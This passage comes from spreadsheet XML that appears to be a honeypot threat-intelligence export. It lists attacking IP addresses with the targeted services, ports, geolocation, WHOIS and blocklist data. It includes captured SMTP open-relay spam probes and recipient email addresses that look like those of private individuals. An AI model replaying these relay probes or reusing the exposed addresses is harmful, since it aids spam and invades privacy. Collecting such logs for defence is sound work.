    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_SMB_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;37985&amp;&amp;3306</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,6587)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,61206)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,61978)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,57672)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,51310)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,15524)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,52150)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,26853)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,60823)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,7704)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,8099)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,51575)}&amp;&amp;{Data_SMB:Incoming connection (180.183.246.225,52352)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>['NS2.3BB.CO.TH', 'NS1.3BB.CO.TH']</t>
  </si>
  <si>
    <t>THNIC</t>
  </si>
  <si>
    <t>ACTIVE</t>
  </si>
  <si>
    <t>staff@thnic.co.th</t>
  </si>
  <si>
    <t>::ffff:b4b7:f6e1</t>
  </si>
  <si>
    <t>8f9519a45f8ff172671a185592315c1a</t>
  </si>
  <si>
    <t>110.24.32.53</t>
  </si>
  <si>
    <t>NA&amp;&amp;110-24-32-53.adsl.fetnet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;16417</t>
  </si>
  <si>
    <t>2009-02-23</t>
  </si>
  <si>
    <t>FETNET-NET</t>
  </si>
  <si>
    <t>1999-09-10 03:35:57</t>
  </si>
  <si>
    <t>2025-09-10 03:35:57</t>
  </si>
  <si>
    <t>2023-09-08 10:24:41</t>
  </si>
  <si>
    <t>['DNS01.FETNET.NET', 'DNS02.FETNET.NET']</t>
  </si>
  <si>
    <t>Network Solutions, LLC</t>
  </si>
  <si>
    <t>domain.operations@web.com</t>
  </si>
  <si>
    <t>::ffff:6e18:2035</t>
  </si>
  <si>
    <t>ee8010c7cd6eb27660d41aa945bdd4e8</t>
  </si>
  <si>
    <t>14.229.171.55</t>
  </si>
  <si>
    <t>Thái Bình Province</t>
  </si>
  <si>
    <t>Tiền Hải District</t>
  </si>
  <si>
    <t>Tiền Hải</t>
  </si>
  <si>
    <t>1572508</t>
  </si>
  <si>
    <t>20.4056</t>
  </si>
  <si>
    <t>106.504</t>
  </si>
  <si>
    <t>::ffff:ee5:ab37</t>
  </si>
  <si>
    <t>ea3e12e5c82395ffb5215ddce433174c</t>
  </si>
  <si>
    <t>47.143.196.70</t>
  </si>
  <si>
    <t>NA&amp;&amp;47-143-196-70.bng01.mntc.ca.frontiernet.net</t>
  </si>
  <si>
    <t>Pomona</t>
  </si>
  <si>
    <t>5384170</t>
  </si>
  <si>
    <t>91766</t>
  </si>
  <si>
    <t>34.044</t>
  </si>
  <si>
    <t>-117.727</t>
  </si>
  <si>
    <t>2015-08-28</t>
  </si>
  <si>
    <t>FCC-212</t>
  </si>
  <si>
    <t>1995-10-14 04:00:00</t>
  </si>
  <si>
    <t>2025-10-13 04:00:00</t>
  </si>
  <si>
    <t>2025-02-12 08:29:05</t>
  </si>
  <si>
    <t>['A1-204.AKAM.NET', 'A13-67.AKAM.NET', 'AUTH.ASBN.VA.FRONTIERNET.NET', 'AUTH.FRONTIERNET.NET', 'AUTH.ROCH.NY.FRONTIERNET.NET']</t>
  </si>
  <si>
    <t>Register.com, Inc.</t>
  </si>
  <si>
    <t>::ffff:2f8f:c446</t>
  </si>
  <si>
    <t>9549ba52ca0c5bf417ffdc96295bc930</t>
  </si>
  <si>
    <t>47.236.96.208</t>
  </si>
  <si>
    <t>SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_MYSQL_H18</t>
  </si>
  <si>
    <t>21&amp;&amp;3306&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2fec:60d0</t>
  </si>
  <si>
    <t>d2fa367a044f3d347a1e29ca64bcbac6</t>
  </si>
  <si>
    <t>122.100.242.76</t>
  </si>
  <si>
    <t>nz242l76.bb122100.ctm.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Macao</t>
  </si>
  <si>
    <t>Nossa Senhora do Carmo</t>
  </si>
  <si>
    <t>Taipa</t>
  </si>
  <si>
    <t>1821263</t>
  </si>
  <si>
    <t>22.1597</t>
  </si>
  <si>
    <t>113.564</t>
  </si>
  <si>
    <t>4609</t>
  </si>
  <si>
    <t>Companhia de Telecomunicacoes de Macau</t>
  </si>
  <si>
    <t>CTM Internet Service</t>
  </si>
  <si>
    <t>::ffff:7a64:f24c</t>
  </si>
  <si>
    <t>d4c03ba4e43ccdeafa7a8b72868b75eb</t>
  </si>
  <si>
    <t>192.252.181.45</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>Integen, Inc</t>
  </si>
  <si>
    <t>2013-06-28</t>
  </si>
  <si>
    <t>INTEGEN-2</t>
  </si>
  <si>
    <t>::ffff:c0fc:b52d</t>
  </si>
  <si>
    <t>7937a07e936ff375bbcf69c66d571c63</t>
  </si>
  <si>
    <t>59.26.118.224</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>2004-08-02</t>
  </si>
  <si>
    <t>::ffff:3b1a:76e0</t>
  </si>
  <si>
    <t>af823837b43b1e8796ad79ce59b72bfe</t>
  </si>
  <si>
    <t>219.102.129.46</t>
  </si>
  <si>
    <t>pl10286.ag2001.nttpc.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>2514</t>
  </si>
  <si>
    <t>NTT PC Communications, Inc.</t>
  </si>
  <si>
    <t>InfoSphere</t>
  </si>
  <si>
    <t>::ffff:db66:812e</t>
  </si>
  <si>
    <t>6e6871542aab50aafffa351e2e7a87d4</t>
  </si>
  <si>
    <t>61.244.59.51</t>
  </si>
  <si>
    <t>NA&amp;&amp;061244059051.static.ctinets.com</t>
  </si>
  <si>
    <t>9269</t>
  </si>
  <si>
    <t>Hong Kong Broadband Network Ltd</t>
  </si>
  <si>
    <t>::ffff:3df4:3b33</t>
  </si>
  <si>
    <t>c7231d79ff2695291f26c97c50a65b03</t>
  </si>
  <si>
    <t>114.200.79.187</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>::ffff:72c8:4fbb</t>
  </si>
  <si>
    <t>cef08217679f91ebc2a149366230d20a</t>
  </si>
  <si>
    <t>125.139.58.175</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;28253&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>Muju-gun</t>
  </si>
  <si>
    <t>Muju-gun (Muju-eup)</t>
  </si>
  <si>
    <t>1840941</t>
  </si>
  <si>
    <t>36.0115</t>
  </si>
  <si>
    <t>127.656</t>
  </si>
  <si>
    <t>Jeonbukbonbujang</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7d8b:3aaf</t>
  </si>
  <si>
    <t>0c44399198b26edc2f9980102ba1e877</t>
  </si>
  <si>
    <t>221.164.234.19</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;585&amp;&amp;44173&amp;&amp;44196&amp;&amp;44219&amp;&amp;44230&amp;&amp;44243&amp;&amp;44261&amp;&amp;NA&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dda4:ea13</t>
  </si>
  <si>
    <t>64ef1305778dcc6c3589f3df26fad305</t>
  </si>
  <si>
    <t>92.46.231.58</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;8382&amp;&amp;NA</t>
  </si>
  <si>
    <t>50482</t>
  </si>
  <si>
    <t>TOO Ruslan LTD</t>
  </si>
  <si>
    <t>::ffff:5c2e:e73a</t>
  </si>
  <si>
    <t>bb9cf23ea62459ba09219adcc2352050</t>
  </si>
  <si>
    <t>195.211.191.80</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H13</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 9 Feb 2025 15:45:32 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Feb 2025 02:52:16 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 16 Mar 2025 13:02:50 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 18 Mar 2025 10:15:04 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;test@test.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;officeofficez50@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;youngslim1997@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rodneysmith@susquehanabk.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rodney.smith2024@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rodneysmith@susquehanabank.co&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;philipwlowe@workmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;joshuaboblin28@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '94.131.113.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 20 Mar 2025 11:18:44 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:c3d3:bf50</t>
  </si>
  <si>
    <t>0b4ed68c4d6954a11dd5b17e7a7a57ed</t>
  </si>
  <si>
    <t>202.169.234.49</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>23&amp;&amp;60111&amp;&amp;NA</t>
  </si>
  <si>
    <t>-7.79558</t>
  </si>
  <si>
    <t>110.369</t>
  </si>
  <si>
    <t>23671</t>
  </si>
  <si>
    <t>PT. Sarana InsanMuda Selaras</t>
  </si>
  <si>
    <t>Jogja Medianet</t>
  </si>
  <si>
    <t>2002-07-16</t>
  </si>
  <si>
    <t>JMN-ID</t>
  </si>
  <si>
    <t>::ffff:caa9:ea31</t>
  </si>
  <si>
    <t>a84142d2f93515a39e899cce9a2c7a2c</t>
  </si>
  <si>
    <t>202.88.228.125</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>1433&amp;&amp;49931&amp;&amp;445</t>
  </si>
  <si>
    <t>2000-08-08</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.88.228.125,65322)}</t>
  </si>
  <si>
    <t>::ffff:ca58:e47d</t>
  </si>
  <si>
    <t>5057a4c9b883c18746500569e1575182</t>
  </si>
  <si>
    <t>216.181.107.251</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;53929&amp;&amp;57886&amp;&amp;58524&amp;&amp;58661&amp;&amp;64077&amp;&amp;56161&amp;&amp;63219&amp;&amp;50378&amp;&amp;58235&amp;&amp;56170&amp;&amp;52376&amp;&amp;55880&amp;&amp;53163&amp;&amp;62585&amp;&amp;54236&amp;&amp;55924&amp;&amp;50786&amp;&amp;55746&amp;&amp;64764&amp;&amp;58447&amp;&amp;60076&amp;&amp;52880&amp;&amp;62686&amp;&amp;49158&amp;&amp;50491&amp;&amp;52417&amp;&amp;52655&amp;&amp;55613&amp;&amp;54164&amp;&amp;55892&amp;&amp;51230&amp;&amp;63321&amp;&amp;61939&amp;&amp;52948&amp;&amp;54725&amp;&amp;49581&amp;&amp;54020&amp;&amp;55542&amp;&amp;53850&amp;&amp;60590&amp;&amp;53926&amp;&amp;50186&amp;&amp;54572&amp;&amp;51390&amp;&amp;54231&amp;&amp;65508&amp;&amp;54745&amp;&amp;49189&amp;&amp;59028&amp;&amp;56824&amp;&amp;49803&amp;&amp;55507&amp;&amp;59623&amp;&amp;49567&amp;&amp;55357&amp;&amp;63829&amp;&amp;61781&amp;&amp;53397&amp;&amp;54613</t>
  </si>
  <si>
    <t>Spokane</t>
  </si>
  <si>
    <t>Liberty Lake</t>
  </si>
  <si>
    <t>5800870</t>
  </si>
  <si>
    <t>99019</t>
  </si>
  <si>
    <t>47.6743</t>
  </si>
  <si>
    <t>-117.112</t>
  </si>
  <si>
    <t>400304</t>
  </si>
  <si>
    <t>Redoubt Networks</t>
  </si>
  <si>
    <t>2022-02-01</t>
  </si>
  <si>
    <t>CB-V4-02</t>
  </si>
  <si>
    <t>2025-03-05</t>
  </si>
  <si>
    <t>::ffff:d8b5:6bfb</t>
  </si>
  <si>
    <t>fd12dd0025e994801ceaf63e4eb59006</t>
  </si>
  <si>
    <t>103.165.154.154</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_REDIS_H43&amp;&amp;SMA-LAB_HTTP_H41&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_ORACLE_H43&amp;&amp;SMA-LAB_NTP_H18&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900&amp;&amp;6379&amp;&amp;80&amp;&amp;9100&amp;&amp;1521&amp;&amp;123&amp;&amp;1080&amp;&amp;143&amp;&amp;19248&amp;&amp;57734&amp;&amp;57678</t>
  </si>
  <si>
    <t>{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam']}</t>
  </si>
  <si>
    <t>Kota Pasuruan</t>
  </si>
  <si>
    <t>Pasuruan</t>
  </si>
  <si>
    <t>1632033</t>
  </si>
  <si>
    <t>-7.64678</t>
  </si>
  <si>
    <t>112.908</t>
  </si>
  <si>
    <t>141965</t>
  </si>
  <si>
    <t>Diskominfo Kota Pasuruan</t>
  </si>
  <si>
    <t>2021-04-05</t>
  </si>
  <si>
    <t>IDNIC-PSNKOTA-ID</t>
  </si>
  <si>
    <t>::ffff:67a5:9a9a</t>
  </si>
  <si>
    <t>b4256d0b9c265bb4a24b0fa1948629eb</t>
  </si>
  <si>
    <t>176.166.13.99</t>
  </si>
  <si>
    <t>NA&amp;&amp;static-176-166-13-99.ftth.abo.bbox.fr</t>
  </si>
  <si>
    <t>Hauts-de-Seine</t>
  </si>
  <si>
    <t>Nanterre</t>
  </si>
  <si>
    <t>2990970</t>
  </si>
  <si>
    <t>92000</t>
  </si>
  <si>
    <t>48.8924</t>
  </si>
  <si>
    <t>2.21533</t>
  </si>
  <si>
    <t>5410</t>
  </si>
  <si>
    <t>Bouygues Telecom SA</t>
  </si>
  <si>
    <t>BOUYGUES Telecom</t>
  </si>
  <si>
    <t>2008-05-14 15:53:11</t>
  </si>
  <si>
    <t>2025-07-10 14:10:29</t>
  </si>
  <si>
    <t>2024-07-13 22:03:43</t>
  </si>
  <si>
    <t>['ns1.bouyguesbox.fr', 'ns2.bouyguesbox.fr', 'nsa.perf1.fr', 'nsb.perf1.com', 'nsc.perf1.com']</t>
  </si>
  <si>
    <t>NAMESHIELD</t>
  </si>
  <si>
    <t>['ACTIVE', 'serverUpdateProhibited', 'serverTransferProhibited', 'serverDeleteProhibited', 'serverRecoverProhibited', 'associated', 'not identified']</t>
  </si>
  <si>
    <t>['registrar@nameshield.net', 'webmaster@bouyguestelecom.fr', 'dnsextmaster@bouyguestelecom.fr']</t>
  </si>
  <si>
    <t>::ffff:b0a6:d63</t>
  </si>
  <si>
    <t>ec50f8ef415edb9f6592d1cd872d5866</t>
  </si>
  <si>
    <t>188.113.86.156</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3</t>
  </si>
  <si>
    <t>03</t>
  </si>
  <si>
    <t>Oslo</t>
  </si>
  <si>
    <t>3143244</t>
  </si>
  <si>
    <t>0001</t>
  </si>
  <si>
    <t>59.9124</t>
  </si>
  <si>
    <t>10.7742</t>
  </si>
  <si>
    <t>41164</t>
  </si>
  <si>
    <t>Telia Norge AS</t>
  </si>
  <si>
    <t>Get AS</t>
  </si>
  <si>
    <t>::ffff:bc71:569c</t>
  </si>
  <si>
    <t>de4978a17e7566702de2d4c2e8712fa4</t>
  </si>
  <si>
    <t>27.255.132.2</t>
  </si>
  <si>
    <t>2010-06-17</t>
  </si>
  <si>
    <t>ADSL_BROADBAND</t>
  </si>
  <si>
    <t>::ffff:1bff:8402</t>
  </si>
  <si>
    <t>2d3e7b8b67f8d6dd634c6b2051090060</t>
  </si>
  <si>
    <t>213.230.90.29</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;44366&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>UZ</t>
  </si>
  <si>
    <t>Uzbekistan</t>
  </si>
  <si>
    <t>TK</t>
  </si>
  <si>
    <t>Tashkent</t>
  </si>
  <si>
    <t>Tashkent (Shayxontohur tumani)</t>
  </si>
  <si>
    <t>1512569</t>
  </si>
  <si>
    <t>41.3224</t>
  </si>
  <si>
    <t>69.2482</t>
  </si>
  <si>
    <t>8193</t>
  </si>
  <si>
    <t>Uzbektelekom Joint Stock Company</t>
  </si>
  <si>
    <t>Uzbektelecom JSC</t>
  </si>
  <si>
    <t>::ffff:d5e6:5a1d</t>
  </si>
  <si>
    <t>0abf236266773670522b797aacc40a7b</t>
  </si>
  <si>
    <t>36.64.106.226</t>
  </si>
  <si>
    <t>2011-01-14</t>
  </si>
  <si>
    <t>TLKM_BB_INF_36_64</t>
  </si>
  <si>
    <t>::ffff:2440:6ae2</t>
  </si>
  <si>
    <t>a4a8fe0a7c82be25656dfa25b75fc1ab</t>
  </si>
  <si>
    <t>117.214.75.118</t>
  </si>
  <si>
    <t>::ffff:75d6:4b76</t>
  </si>
  <si>
